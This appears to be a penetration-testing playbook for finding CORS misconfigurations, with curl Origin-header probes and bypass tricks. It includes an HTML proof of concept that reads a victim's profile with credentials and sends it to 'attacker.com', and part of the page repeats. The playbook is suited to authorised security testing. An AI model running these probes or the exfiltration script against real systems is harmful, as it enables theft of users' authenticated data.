name	attack-cors
description	CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage
category	web-application
version	1.0
author	cyberstrike-official
tags	["cors","web","owasp","access-control","attack"]
tech_stack	["web"]
cwe_ids	["CWE-942","CWE-346"]
chains_with	["attack-open-redirect","attack-idor-automation"]
prerequisites	[]
severity_boost	{"attack-open-redirect":"CORS + open redirect = token theft via cross-origin request"}

CORS Misconfiguration Attack

Objective

Identify Cross-Origin Resource Sharing misconfigurations that allow unauthorized cross-origin access to sensitive data or APIs.

Testing Methodology

Phase 1: Origin Reflection Detection

Test if the server reflects arbitrary origins in Access-Control-Allow-Origin:

# Automated CORS checker (bundled script)
attack_script cors_checker https://TARGET/api/endpoint --json-output

Manual tests:

# Arbitrary origin
curl -s -H "Origin: https://evil.com" TARGET_URL -D- | grep -i "access-control"

# Subdomain bypass
curl -s -H "Origin: https://TARGET.evil.com" TARGET_URL -D-

# Null origin
curl -s -H "Origin: null" TARGET_URL -D-

# HTTP downgrade
curl -s -H "Origin: http://TARGET" TARGET_URL -D-

Phase 2: Bypass Techniques

# Backtick bypass
curl -s -H "Origin: https://TARGET%60.evil.com" TARGET_URL -D-

# Underscore bypass
curl -s -H "Origin: https://TARGET_.evil.com" TARGET_URL -D-

# CRLF injection
curl -s -H "Origin: https://evil.com%0d%0a" TARGET_URL -D-

# Prefix matching bypass
curl -s -H "Origin: https://evil-TARGET" TARGET_URL -D-

Phase 3: Impact Verification

If ACAO reflects attacker origin + ACAC is true:

<!-- PoC: reads victim data cross-origin -->
<script>
fetch('https://TARGET/api/user/profile', {
  credentials: 'include'
})
.then(r => r.json())
.then(d => fetch('https://attacker.com/log?data=' + btoa(JSON.stringify(d))))
</script>

What Constitutes a Finding

Condition	Severity
Arbitrary origin reflected + credentials allowed	Critical (P1)
Arbitrary origin reflected, no credentials	Medium (P3)
null origin accepted + credentials allowed	High (P2)
Subdomain origin reflected + credentials	High (P2)
Wildcard ACAO with credentials	Medium (P3)

Evidence Requirements

Request with attacker Origin header
Response showing Access-Control-Allow-Origin reflection
Response showing Access-Control-Allow-Credentials: true
PoC HTML demonstrating cross-origin data access

Tools

attack_script cors_checker — automated multi-origin testing
curl — manual header injection
Browser DevTools — verify CORS behavior

References

More from this repository

same repository

attack-cache-poison

CyberStrikeus/CyberStrike

Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users

2026-06-01334

attack-graphql

CyberStrikeus/CyberStrike

GraphQL vulnerability testing — introspection exposure, complexity DoS, batch abuse, mutation auth bypass

2026-06-01334

attack-host-header

CyberStrikeus/CyberStrike

Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host

2026-06-01334

attack-idor-automation

CyberStrikeus/CyberStrike

IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure

2026-06-01334

attack-jwt

CyberStrikeus/CyberStrike

JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping

2026-06-01334

attack-open-redirect

CyberStrikeus/CyberStrike

Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains

2026-06-01334

name	attack-cors
description	CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage
category	web-application
version	1.0
author	cyberstrike-official
tags	["cors","web","owasp","access-control","attack"]
tech_stack	["web"]
cwe_ids	["CWE-942","CWE-346"]
chains_with	["attack-open-redirect","attack-idor-automation"]
prerequisites	[]
severity_boost	{"attack-open-redirect":"CORS + open redirect = token theft via cross-origin request"}

CORS Misconfiguration Attack

Objective

Identify Cross-Origin Resource Sharing misconfigurations that allow unauthorized cross-origin access to sensitive data or APIs.

Testing Methodology

Phase 1: Origin Reflection Detection

Test if the server reflects arbitrary origins in Access-Control-Allow-Origin:

# Automated CORS checker (bundled script)
attack_script cors_checker https://TARGET/api/endpoint --json-output

Manual tests:

# Arbitrary origin
curl -s -H "Origin: https://evil.com" TARGET_URL -D- | grep -i "access-control"

# Subdomain bypass
curl -s -H "Origin: https://TARGET.evil.com" TARGET_URL -D-

# Null origin
curl -s -H "Origin: null" TARGET_URL -D-

# HTTP downgrade
curl -s -H "Origin: http://TARGET" TARGET_URL -D-

Phase 2: Bypass Techniques

# Backtick bypass
curl -s -H "Origin: https://TARGET%60.evil.com" TARGET_URL -D-

# Underscore bypass
curl -s -H "Origin: https://TARGET_.evil.com" TARGET_URL -D-

# CRLF injection
curl -s -H "Origin: https://evil.com%0d%0a" TARGET_URL -D-

# Prefix matching bypass
curl -s -H "Origin: https://evil-TARGET" TARGET_URL -D-

Phase 3: Impact Verification

If ACAO reflects attacker origin + ACAC is true:

<!-- PoC: reads victim data cross-origin -->
<script>
fetch('https://TARGET/api/user/profile', {
  credentials: 'include'
})
.then(r => r.json())
.then(d => fetch('https://attacker.com/log?data=' + btoa(JSON.stringify(d))))
</script>

What Constitutes a Finding

Condition	Severity
Arbitrary origin reflected + credentials allowed	Critical (P1)
Arbitrary origin reflected, no credentials	Medium (P3)
null origin accepted + credentials allowed	High (P2)
Subdomain origin reflected + credentials	High (P2)
Wildcard ACAO with credentials	Medium (P3)